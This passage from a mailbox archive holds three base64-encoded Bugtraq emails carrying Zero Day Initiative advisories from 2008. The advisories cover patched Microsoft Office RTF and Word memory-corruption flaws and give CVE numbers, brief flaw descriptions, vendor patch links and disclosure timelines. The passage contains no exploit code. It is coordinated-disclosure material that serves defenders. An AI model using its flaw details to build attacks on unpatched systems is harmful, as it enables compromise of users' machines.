aWVzL2Rpc2Nsb3N1cmVfcG9saWN5Lw0KDQpDT05GSURFTlRJQUxJVFkgTk9USUNFOiBUaGlzIGUt
bWFpbCBtZXNzYWdlLCBpbmNsdWRpbmcgYW55IGF0dGFjaG1lbnRzLA0KaXMgYmVpbmcgc2VudCBi
eSAzQ29tIGZvciB0aGUgc29sZSB1c2Ugb2YgdGhlIGludGVuZGVkIHJlY2lwaWVudChzKSBhbmQN
Cm1heSBjb250YWluIGNvbmZpZGVudGlhbCwgcHJvcHJpZXRhcnkgYW5kL29yIHByaXZpbGVnZWQg
aW5mb3JtYXRpb24uDQpBbnkgdW5hdXRob3JpemVkIHJldmlldywgdXNlLCBkaXNjbG9zdXJlIGFu
ZC9vciBkaXN0cmlidXRpb24gYnkgYW55IA0KcmVjaXBpZW50IGlzIHByb2hpYml0ZWQuICBJZiB5
b3UgYXJlIG5vdCB0aGUgaW50ZW5kZWQgcmVjaXBpZW50LCBwbGVhc2UNCmRlbGV0ZSBhbmQvb3Ig
ZGVzdHJveSBhbGwgY29waWVzIG9mIHRoaXMgbWVzc2FnZSByZWdhcmRsZXNzIG9mIGZvcm0gYW5k
DQphbnkgaW5jbHVkZWQgYXR0YWNobWVudHMgYW5kIG5vdGlmeSAzQ29tIGltbWVkaWF0ZWx5IGJ5
IGNvbnRhY3RpbmcgdGhlDQpzZW5kZXIgdmlhIHJlcGx5IGUtbWFpbCBvciBmb3J3YXJkaW5nIHRv
IDNDb20gYXQgcG9zdG1hc3RlckAzY29tLmNvbS4gDQo
From - Tue Dec  9 16:49:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f85
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38880-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id AC143EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:43:19 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 935AD236FD1; Tue,  9 Dec 2008 14:08:37 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29393 invoked from network); 9 Dec 2008 20:51:28 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-084: Microsoft Office RTF Consecutive Drawing Object Parsing Heap
 Corruption Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF1EE0C28F.9DA28F3B-ON8825751A.007415CE-8625751A.00741E35@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Tue, 9 Dec 2008 15:08:20 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/09/2008 01:08:24 PM,
Serialize complete at 12/09/2008 01:08:24 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA4NDogTWljcm9zb2Z0IE9mZmljZSBSVEYgQ29uc2VjdXRpdmUgRHJhd2luZyBPYmpl
Y3QgUGFyc2luZyBIZWFwIA0KQ29ycnVwdGlvbiBWdWxuZXJhYmlsaXR5DQpodHRwOi8vd3d3Lnpl
cm9kYXlpbml0aWF0aXZlLmNvbS9hZHZpc29yaWVzL1pESS0wOC0wODQNCkRlY2VtYmVyIDksIDIw
MDgNCg0KLS0gQ1ZFIElEOg0KQ1ZFLTIwMDgtNDAyNw0KDQotLSBBZmZlY3RlZCBWZW5kb3JzOg0K
TWljcm9zb2Z0DQoNCi0tIEFmZmVjdGVkIFByb2R1Y3RzOg0KTWljcm9zb2Z0IE9mZmljZSBXb3Jk
DQpNaWNyb3NvZnQgT3V0bG9vaw0KDQotLSBUaXBwaW5nUG9pbnQoVE0pIElQUyBDdXN0b21lciBQ
cm90ZWN0aW9uOg0KVGlwcGluZ1BvaW50IElQUyBjdXN0b21lcnMgaGF2ZSBiZWVuIHByb3RlY3Rl
ZCBhZ2FpbnN0IHRoaXMNCnZ1bG5lcmFiaWxpdHkgYnkgRGlnaXRhbCBWYWNjaW5lIHByb3RlY3Rp
b24gZmlsdGVyIElEIDY2MDcuIA0KRm9yIGZ1cnRoZXIgcHJvZHVjdCBpbmZvcm1hdGlvbiBvbiB0
aGUgVGlwcGluZ1BvaW50IElQUywgdmlzaXQ6DQoNCiAgICBodHRwOi8vd3d3LnRpcHBpbmdwb2lu
dC5jb20NCg0KLS0gVnVsbmVyYWJpbGl0eSBEZXRhaWxzOg0KVGhpcyB2dWxuZXJhYmlsaXR5IGFs
bG93cyByZW1vdGUgYXR0YWNrZXJzIHRvIGV4ZWN1dGUgYXJiaXRyYXJ5IGNvZGUgb24NCnZ1bG5l
cmFibGUgaW5zdGFsbGF0aW9ucyBvZiBNaWNyb3NvZnQgT2ZmaWNlLiBVc2VyIGludGVyYWN0aW9u
IGlzDQpyZXF1aXJlZCB0byBleHBsb2l0IHRoaXMgdnVsbmVyYWJpbGl0eSBpbiB0aGF0IHRoZSB0
YXJnZXQgbXVzdCB2aXNpdCBhDQptYWxpY2lvdXMgcGFnZSwgb3BlbiBhIG1hbGljaW91cyBlLW1h
aWwsIG9yIG9wZW4gYSBtYWxpY2lvdXMgZmlsZS4NCg0KVGhlIHNwZWNpZmljIGZsYXcgZXhpc3Rz
IHdoZW4gcGFyc2luZyBtYWxmb3JtZWQgUlRGIGRvY3VtZW50cy4gV2hlbg0KcHJvY2Vzc2luZyBj
b25zZWN1dGl2ZSAiXGRvIiBEcmF3aW5nIE9iamVjdCB0YWdzIG1zby5kbGwgZG9lcyBub3QNCnBy
b3Blcmx5IHZlcmlmeSB0aGUgaW50ZWdyaXR5IG9mIHRoZSBvYmplY3QgYW5kIGZyZWVzIGEgbWVt
b3J5IGJ1ZmZlcg0KdHdpY2UsIGxlYWRpbmcgdG8gaGVhcCBjb3JydXB0aW9uLiBTdWNjZXNzZnVs
IGV4cGxvaXRhdGlvbiBjYW4gbGVhZCB0bw0KcmVtb3RlIGNvbXByb21pc2Ugb2YgYSBzeXN0ZW0g
dW5kZXIgdGhlIGNyZWRlbnRpYWxzIG9mIHRoZSBjdXJyZW50bHkNCmxvZ2dlZCBpbiB1c2VyLg0K
DQotLSBWZW5kb3IgUmVzcG9uc2U6DQpNaWNyb3NvZnQgaGFzIGlzc3VlZCBhbiB1cGRhdGUgdG8g
Y29ycmVjdCB0aGlzIHZ1bG5lcmFiaWxpdHkuIE1vcmUNCmRldGFpbHMgY2FuIGJlIGZvdW5kIGF0
Og0KDQpodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vdGVjaG5ldC9zZWN1cml0eS9idWxsZXRpbi9N
UzA4LTA3Mi5tc3B4DQoNCi0tIERpc2Nsb3N1cmUgVGltZWxpbmU6DQoyMDA4LTA1LTE5IC0gVnVs
bmVyYWJpbGl0eSByZXBvcnRlZCB0byB2ZW5kb3INCjIwMDgtMTItMDkgLSBDb29yZGluYXRlZCBw
dWJsaWMgcmVsZWFzZSBvZiBhZHZpc29yeQ0KDQotLSBDcmVkaXQ6DQpUaGlzIHZ1bG5lcmFiaWxp
dHkgd2FzIGRpc2NvdmVyZWQgYnk6DQogICAgKiB3dXNoaSBvZiB0ZWFtNTA5DQoNCi0tIEFib3V0
IHRoZSBaZXJvIERheSBJbml0aWF0aXZlIChaREkpOg0KRXN0YWJsaXNoZWQgYnkgVGlwcGluZ1Bv
aW50LCBUaGUgWmVybyBEYXkgSW5pdGlhdGl2ZSAoWkRJKSByZXByZXNlbnRzIA0KYSBiZXN0LW9m
LWJyZWVkIG1vZGVsIGZvciByZXdhcmRpbmcgc2VjdXJpdHkgcmVzZWFyY2hlcnMgZm9yIHJlc3Bv
bnNpYmx5DQpkaXNjbG9zaW5nIGRpc2NvdmVyZWQgdnVsbmVyYWJpbGl0aWVzLg0KDQpSZXNlYXJj
aGVycyBpbnRlcmVzdGVkIGluIGdldHRpbmcgcGFpZCBmb3IgdGhlaXIgc2VjdXJpdHkgcmVzZWFy
Y2gNCnRocm91Z2ggdGhlIFpESSBjYW4gZmluZCBtb3JlIGluZm9ybWF0aW9uIGFuZCBzaWduLXVw
IGF0Og0KDQogICAgaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20NCg0KVGhlIFpESSBp
cyB1bmlxdWUgaW4gaG93IHRoZSBhY3F1aXJlZCB2dWxuZXJhYmlsaXR5IGluZm9ybWF0aW9uIGlz
DQp1c2VkLiBUaXBwaW5nUG9pbnQgZG9lcyBub3QgcmUtc2VsbCB0aGUgdnVsbmVyYWJpbGl0eSBk
ZXRhaWxzIG9yIGFueQ0KZXhwbG9pdCBjb2RlLiBJbnN0ZWFkLCB1cG9uIG5vdGlmeWluZyB0aGUg
YWZmZWN0ZWQgcHJvZHVjdCB2ZW5kb3IsDQpUaXBwaW5nUG9pbnQgcHJvdmlkZXMgaXRzIGN1c3Rv
bWVycyB3aXRoIHplcm8gZGF5IHByb3RlY3Rpb24gdGhyb3VnaA0KaXRzIGludHJ1c2lvbiBwcmV2
ZW50aW9uIHRlY2hub2xvZ3kuIEV4cGxpY2l0IGRldGFpbHMgcmVnYXJkaW5nIHRoZQ0Kc3BlY2lm
aWNzIG9mIHRoZSB2dWxuZXJhYmlsaXR5IGFyZSBub3QgZXhwb3NlZCB0byBhbnkgcGFydGllcyB1
bnRpbA0KYW4gb2ZmaWNpYWwgdmVuZG9yIHBhdGNoIGlzIHB1YmxpY2x5IGF2YWlsYWJsZS4gRnVy
dGhlcm1vcmUsIHdpdGggdGhlDQphbHRydWlzdGljIGFpbSBvZiBoZWxwaW5nIHRvIHNlY3VyZSBh
IGJyb2FkZXIgdXNlciBiYXNlLCBUaXBwaW5nUG9pbnQNCnByb3ZpZGVzIHRoaXMgdnVsbmVyYWJp
bGl0eSBpbmZvcm1hdGlvbiBjb25maWRlbnRpYWxseSB0byBzZWN1cml0eQ0KdmVuZG9ycyAoaW5j
bHVkaW5nIGNvbXBldGl0b3JzKSB3aG8gaGF2ZSBhIHZ1bG5lcmFiaWxpdHkgcHJvdGVjdGlvbiBv
cg0KbWl0aWdhdGlvbiBwcm9kdWN0Lg0KDQpPdXIgdnVsbmVyYWJpbGl0eSBkaXNjbG9zdXJlIHBv
bGljeSBpcyBhdmFpbGFibGUgb25saW5lIGF0Og0KDQogICAgaHR0cDovL3d3dy56ZXJvZGF5aW5p
dGlhdGl2ZS5jb20vYWR2aXNvcmllcy9kaXNjbG9zdXJlX3BvbGljeS8NCg0KQ09ORklERU5USUFM
SVRZIE5PVElDRTogVGhpcyBlLW1haWwgbWVzc2FnZSwgaW5jbHVkaW5nIGFueSBhdHRhY2htZW50
cywNCmlzIGJlaW5nIHNlbnQgYnkgM0NvbSBmb3IgdGhlIHNvbGUgdXNlIG9mIHRoZSBpbnRlbmRl
ZCByZWNpcGllbnQocykgYW5kDQptYXkgY29udGFpbiBjb25maWRlbnRpYWwsIHByb3ByaWV0YXJ5
IGFuZC9vciBwcml2aWxlZ2VkIGluZm9ybWF0aW9uLg0KQW55IHVuYXV0aG9yaXplZCByZXZpZXcs
IHVzZSwgZGlzY2xvc3VyZSBhbmQvb3IgZGlzdHJpYnV0aW9uIGJ5IGFueSANCnJlY2lwaWVudCBp
cyBwcm9oaWJpdGVkLiAgSWYgeW91IGFyZSBub3QgdGhlIGludGVuZGVkIHJlY2lwaWVudCwgcGxl
YXNlDQpkZWxldGUgYW5kL29yIGRlc3Ryb3kgYWxsIGNvcGllcyBvZiB0aGlzIG1lc3NhZ2UgcmVn
YXJkbGVzcyBvZiBmb3JtIGFuZA0KYW55IGluY2x1ZGVkIGF0dGFjaG1lbnRzIGFuZCBub3RpZnkg
M0NvbSBpbW1lZGlhdGVseSBieSBjb250YWN0aW5nIHRoZQ0Kc2VuZGVyIHZpYSByZXBseSBlLW1h
aWwgb3IgZm9yd2FyZGluZyB0byAzQ29tIGF0IHBvc3RtYXN0ZXJAM2NvbS5jb20uIA0K

From - Tue Dec  9 16:59:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f86
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38881-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3C0B3EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 16:52:00 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6120D23709E; Tue,  9 Dec 2008 14:08:49 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29520 invoked from network); 9 Dec 2008 20:52:40 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-085: Microsoft Office RTF Drawing Object Heap Overflow Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF057B75F9.D7D30BB6-ON8825751A.007429F7-8625751A.00743B6D@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Tue, 9 Dec 2008 15:09:35 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/09/2008 01:09:39 PM,
Serialize complete at 12/09/2008 01:09:39 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA4NTogTWljcm9zb2Z0IE9mZmljZSBSVEYgRHJhd2luZyBPYmplY3QgSGVhcCBPdmVy
ZmxvdyANClZ1bG5lcmFiaWxpdHkNCmh0dHA6Ly93d3cuemVyb2RheWluaXRpYXRpdmUuY29tL2Fk
dmlzb3JpZXMvWkRJLTA4LTA4NQ0KRGVjZW1iZXIgOSwgMjAwOA0KDQotLSBDVkUgSUQ6DQpDVkUt
MjAwOC00MDI4DQoNCi0tIEFmZmVjdGVkIFZlbmRvcnM6DQpNaWNyb3NvZnQNCg0KLS0gQWZmZWN0
ZWQgUHJvZHVjdHM6DQpNaWNyb3NvZnQgT2ZmaWNlIFdvcmQNCk1pY3Jvc29mdCBPdXRsb29rDQoN
Ci0tIFRpcHBpbmdQb2ludChUTSkgSVBTIEN1c3RvbWVyIFByb3RlY3Rpb246DQpUaXBwaW5nUG9p
bnQgSVBTIGN1c3RvbWVycyBoYXZlIGJlZW4gcHJvdGVjdGVkIGFnYWluc3QgdGhpcw0KdnVsbmVy
YWJpbGl0eSBieSBEaWdpdGFsIFZhY2NpbmUgcHJvdGVjdGlvbiBmaWx0ZXIgSUQgNjYxMS4gDQpG
b3IgZnVydGhlciBwcm9kdWN0IGluZm9ybWF0aW9uIG9uIHRoZSBUaXBwaW5nUG9pbnQgSVBTLCB2
aXNpdDoNCg0KICAgIGh0dHA6Ly93d3cudGlwcGluZ3BvaW50LmNvbQ0KDQotLSBWdWxuZXJhYmls
aXR5IERldGFpbHM6DQpUaGlzIHZ1bG5lcmFiaWxpdHkgYWxsb3dzIHJlbW90ZSBhdHRhY2tlcnMg
dG8gZXhlY3V0ZSBhcmJpdHJhcnkgY29kZSBvbg0KdnVsbmVyYWJsZSBpbnN0YWxsYXRpb25zIG9m
IHZhcmlvdXMgTWljcm9zb2Z0IHByb2R1Y3RzIGluY2x1ZGluZyBXb3JkLA0KT3V0bG9vayBhbmQg
V29yZFBhZC4gVXNlciBpbnRlcmFjdGlvbiBpcyByZXF1aXJlZCB0byBleHBsb2l0IHRoaXMNCnZ1
bG5lcmFiaWxpdHkgaW4gdGhhdCB0aGUgdGFyZ2V0IG11c3QgdmlzaXQgYSBtYWxpY2lvdXMgcGFn
ZSwgb3BlbiBhDQptYWxpY2lvdXMgZS1tYWlsLCBvciBvcGVuIGEgbWFsaWNpb3VzIGZpbGUuDQoN
ClRoZSBzcGVjaWZpYyBmbGF3IGV4aXN0cyB3aXRoaW4gdGhlIHBhcnNpbmcgb2YgUlRGIGRvY3Vt
ZW50cyBjb250YWluaW5nDQptdWx0aXBsZSBkcmF3aW5nIG9iamVjdCB0YWdzLiBGaXJzdCwgY29k
ZSB3aXRoaW4gd3dsaWIuZGxsIGFsbG9jYXRlcyBhDQpidWZmZXIgZm9yIHRoZSB0YWcgb2JqZWN0
LiBMYXRlciwgYSByZXN1bHQgZnJvbSBhIGNhbGwgaW50byBtc28uZGxsIGlzDQpjb3BpZWQgaW50
byB0aGUgc2FtZSBidWZmZXIgYnV0IHdpdGggYSBsYXJnZXIgc2l6ZSB0aGFuIHdhcyBhbGxvY2F0
ZWQgYnkNCnRoZSBjYWxsZWUuIFN1Y2Nlc3NmdWwgZXhwbG9pdGF0aW9uIGNhbiBsZWFkIHRvIHJl
bW90ZSBjb21wcm9taXNlIG9mIGENCnN5c3RlbSB1bmRlciB0aGUgY3JlZGVudGlhbHMgb2YgdGhl
IGN1cnJlbnRseSBsb2dnZWQgaW4gdXNlci4NCg0KLS0gVmVuZG9yIFJlc3BvbnNlOg0KTWljcm9z
b2Z0IGhhcyBpc3N1ZWQgYW4gdXBkYXRlIHRvIGNvcnJlY3QgdGhpcyB2dWxuZXJhYmlsaXR5LiBN
b3JlDQpkZXRhaWxzIGNhbiBiZSBmb3VuZCBhdDoNCg0KaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
L3RlY2huZXQvc2VjdXJpdHkvYnVsbGV0aW4vTVMwOC0wNzIubXNweA0KDQotLSBEaXNjbG9zdXJl
IFRpbWVsaW5lOg0KMjAwOC0wNi0yNSAtIFZ1bG5lcmFiaWxpdHkgcmVwb3J0ZWQgdG8gdmVuZG9y
DQoyMDA4LTEyLTA5IC0gQ29vcmRpbmF0ZWQgcHVibGljIHJlbGVhc2Ugb2YgYWR2aXNvcnkNCg0K
LS0gQ3JlZGl0Og0KVGhpcyB2dWxuZXJhYmlsaXR5IHdhcyBkaXNjb3ZlcmVkIGJ5Og0KICAgICog
d3VzaGkgb2YgdGVhbTUwOQ0KDQotLSBBYm91dCB0aGUgWmVybyBEYXkgSW5pdGlhdGl2ZSAoWkRJ
KToNCkVzdGFibGlzaGVkIGJ5IFRpcHBpbmdQb2ludCwgVGhlIFplcm8gRGF5IEluaXRpYXRpdmUg
KFpESSkgcmVwcmVzZW50cyANCmEgYmVzdC1vZi1icmVlZCBtb2RlbCBmb3IgcmV3YXJkaW5nIHNl
Y3VyaXR5IHJlc2VhcmNoZXJzIGZvciByZXNwb25zaWJseQ0KZGlzY2xvc2luZyBkaXNjb3ZlcmVk
IHZ1bG5lcmFiaWxpdGllcy4NCg0KUmVzZWFyY2hlcnMgaW50ZXJlc3RlZCBpbiBnZXR0aW5nIHBh
aWQgZm9yIHRoZWlyIHNlY3VyaXR5IHJlc2VhcmNoDQp0aHJvdWdoIHRoZSBaREkgY2FuIGZpbmQg
bW9yZSBpbmZvcm1hdGlvbiBhbmQgc2lnbi11cCBhdDoNCg0KICAgIGh0dHA6Ly93d3cuemVyb2Rh
eWluaXRpYXRpdmUuY29tDQoNClRoZSBaREkgaXMgdW5pcXVlIGluIGhvdyB0aGUgYWNxdWlyZWQg
dnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiBpcw0KdXNlZC4gVGlwcGluZ1BvaW50IGRvZXMgbm90
IHJlLXNlbGwgdGhlIHZ1bG5lcmFiaWxpdHkgZGV0YWlscyBvciBhbnkNCmV4cGxvaXQgY29kZS4g
SW5zdGVhZCwgdXBvbiBub3RpZnlpbmcgdGhlIGFmZmVjdGVkIHByb2R1Y3QgdmVuZG9yLA0KVGlw
cGluZ1BvaW50IHByb3ZpZGVzIGl0cyBjdXN0b21lcnMgd2l0aCB6ZXJvIGRheSBwcm90ZWN0aW9u
IHRocm91Z2gNCml0cyBpbnRydXNpb24gcHJldmVudGlvbiB0ZWNobm9sb2d5LiBFeHBsaWNpdCBk
ZXRhaWxzIHJlZ2FyZGluZyB0aGUNCnNwZWNpZmljcyBvZiB0aGUgdnVsbmVyYWJpbGl0eSBhcmUg
bm90IGV4cG9zZWQgdG8gYW55IHBhcnRpZXMgdW50aWwNCmFuIG9mZmljaWFsIHZlbmRvciBwYXRj
aCBpcyBwdWJsaWNseSBhdmFpbGFibGUuIEZ1cnRoZXJtb3JlLCB3aXRoIHRoZQ0KYWx0cnVpc3Rp
YyBhaW0gb2YgaGVscGluZyB0byBzZWN1cmUgYSBicm9hZGVyIHVzZXIgYmFzZSwgVGlwcGluZ1Bv
aW50DQpwcm92aWRlcyB0aGlzIHZ1bG5lcmFiaWxpdHkgaW5mb3JtYXRpb24gY29uZmlkZW50aWFs
bHkgdG8gc2VjdXJpdHkNCnZlbmRvcnMgKGluY2x1ZGluZyBjb21wZXRpdG9ycykgd2hvIGhhdmUg
YSB2dWxuZXJhYmlsaXR5IHByb3RlY3Rpb24gb3INCm1pdGlnYXRpb24gcHJvZHVjdC4NCg0KT3Vy
IHZ1bG5lcmFiaWxpdHkgZGlzY2xvc3VyZSBwb2xpY3kgaXMgYXZhaWxhYmxlIG9ubGluZSBhdDoN
Cg0KICAgIGh0dHA6Ly93d3cuemVyb2RheWluaXRpYXRpdmUuY29tL2Fkdmlzb3JpZXMvZGlzY2xv
c3VyZV9wb2xpY3kvDQoNCkNPTkZJREVOVElBTElUWSBOT1RJQ0U6IFRoaXMgZS1tYWlsIG1lc3Nh
Z2UsIGluY2x1ZGluZyBhbnkgYXR0YWNobWVudHMsDQppcyBiZWluZyBzZW50IGJ5IDNDb20gZm9y
IHRoZSBzb2xlIHVzZSBvZiB0aGUgaW50ZW5kZWQgcmVjaXBpZW50KHMpIGFuZA0KbWF5IGNvbnRh
aW4gY29uZmlkZW50aWFsLCBwcm9wcmlldGFyeSBhbmQvb3IgcHJpdmlsZWdlZCBpbmZvcm1hdGlv
bi4NCkFueSB1bmF1dGhvcml6ZWQgcmV2aWV3LCB1c2UsIGRpc2Nsb3N1cmUgYW5kL29yIGRpc3Ry
aWJ1dGlvbiBieSBhbnkgDQpyZWNpcGllbnQgaXMgcHJvaGliaXRlZC4gIElmIHlvdSBhcmUgbm90
IHRoZSBpbnRlbmRlZCByZWNpcGllbnQsIHBsZWFzZQ0KZGVsZXRlIGFuZC9vciBkZXN0cm95IGFs
bCBjb3BpZXMgb2YgdGhpcyBtZXNzYWdlIHJlZ2FyZGxlc3Mgb2YgZm9ybSBhbmQNCmFueSBpbmNs
dWRlZCBhdHRhY2htZW50cyBhbmQgbm90aWZ5IDNDb20gaW1tZWRpYXRlbHkgYnkgY29udGFjdGlu
ZyB0aGUNCnNlbmRlciB2aWEgcmVwbHkgZS1tYWlsIG9yIGZvcndhcmRpbmcgdG8gM0NvbSBhdCBw
b3N0bWFzdGVyQDNjb20uY29tLiANCg=
From - Tue Dec  9 17:09:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f87
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38882-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id DF826EC0BB
for <lists@securityspace.com>; Tue,  9 Dec 2008 17:01:49 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C1A102370BC; Tue,  9 Dec 2008 14:08:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29634 invoked from network); 9 Dec 2008 20:53:32 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-086: Microsoft Office Word Document Table Property Stack Overflow
 Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF750300E4.75257F3E-ON8825751A.00744240-8625751A.00744B12@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Tue, 9 Dec 2008 15:10:15 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/09/2008 01:10:19 PM,
Serialize complete at 12/09/2008 01:10:19 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA4LTA4NjogTWljcm9zb2Z0IE9mZmljZSBXb3JkIERvY3VtZW50IFRhYmxlIFByb3BlcnR5
IFN0YWNrIE92ZXJmbG93IA0KVnVsbmVyYWJpbGl0eQ0KaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlh
dGl2ZS5jb20vYWR2aXNvcmllcy9aREktMDgtMDg2DQpEZWNlbWJlciA5LCAyMDA4DQoNCi0tIENW
RSBJRDoNCkNWRS0yMDA4LTQ4MzcNCg0KLS0gQWZmZWN0ZWQgVmVuZG9yczoNCk1pY3Jvc29mdA0K
DQotLSBBZmZlY3RlZCBQcm9kdWN0czoNCk1pY3Jvc29mdCBPZmZpY2UgV29yZA0KDQotLSBWdWxu
ZXJhYmlsaXR5IERldGFpbHM6DQpUaGlzIHZ1bG5lcmFiaWxpdHkgYWxsb3dzIHJlbW90ZSBhdHRh
Y2tlcnMgdG8gZXhlY3V0ZSBhcmJpdHJhcnkgY29kZSBvbg0KdnVsbmVyYWJsZSBpbnN0YWxsYXRp
b25zIG9mIE1pY3Jvc29mdCBPZmZpY2UgV29yZC4gRXhwbG9pdGF0aW9uIHJlcXVpcmVzDQp0aGF0
IHRoZSBhdHRhY2tlciBjb2VyY2UgdGhlIHRhcmdldCBpbnRvIG9wZW5pbmcgYSBtYWxpY2lvdXMg
LkRPQyBmaWxlLg0KDQpUaGUgc3BlY2lmaWMgZmxhdyBleGlzdHMgd2hlbiBwcm9jZXNzaW5nIGEg
bWFsZm9ybWVkIHRhYmxlIHByb3BlcnR5DQp3aXRoaW4gYSBNaWNyb3NvZnQgV29yZCBkb2N1bWVu
dC4gVXNlci1zdXBwbGllZCBkYXRhIGlzIGNvcGllZCBpbnRvIGENCnN0YWNrLWJhc2VkIGJ1ZmZl
ciB1c2luZyBhIHNpemUgdGhhdCBpcyBjYWxjdWxhdGVkIGZyb20gdGhlIGNvbnRlbnRzIG9mDQp0
aGUgcHJvcGVydHkuIEV4cGxvaXRhdGlvbiBjYW4gcmVzdWx0IGluIGFyYml0cmFyeSBjb2RlIGV4
ZWN1dGlvbiB1bmRlcg0KdGhlIGNvbnRleHQgb2YgdGhlIGN1cnJlbnQgdXNlci4NCg0KLS0gVmVu
ZG9yIFJlc3BvbnNlOg0KTWljcm9zb2Z0IGhhcyBpc3N1ZWQgYW4gdXBkYXRlIHRvIGNvcnJlY3Qg
dGhpcyB2dWxuZXJhYmlsaXR5LiBNb3JlDQpkZXRhaWxzIGNhbiBiZSBmb3VuZCBhdDoNCg0KaHR0
cDovL3d3dy5taWNyb3NvZnQuY29tL3RlY2huZXQvc2VjdXJpdHkvYnVsbGV0aW4vTVMwOC0wNzIu
bXNweA0KDQotLSBEaXNjbG9zdXJlIFRpbWVsaW5lOg0KMjAwOC0wOC0xOSAtIFZ1bG5lcmFiaWxp
dHkgcmVwb3J0ZWQgdG8gdmVuZG9yDQoyMDA4LTEyLTA5IC0gQ29vcmRpbmF0ZWQgcHVibGljIHJl
bGVhc2Ugb2YgYWR2aXNvcnkNCg0KLS0gQ3JlZGl0Og0KVGhpcyB2dWxuZXJhYmlsaXR5IHdhcyBk
aXNjb3ZlcmVkIGJ5Og0KICAgICogd3VzaGkmYW1wO2xpbmcgb2YgdGVhbTUwOQ0KDQotLSBBYm91
dCB0aGUgWmVybyBEYXkgSW5pdGlhdGl2ZSAoWkRJKToNCkVzdGFibGlzaGVkIGJ5IFRpcHBpbmdQ
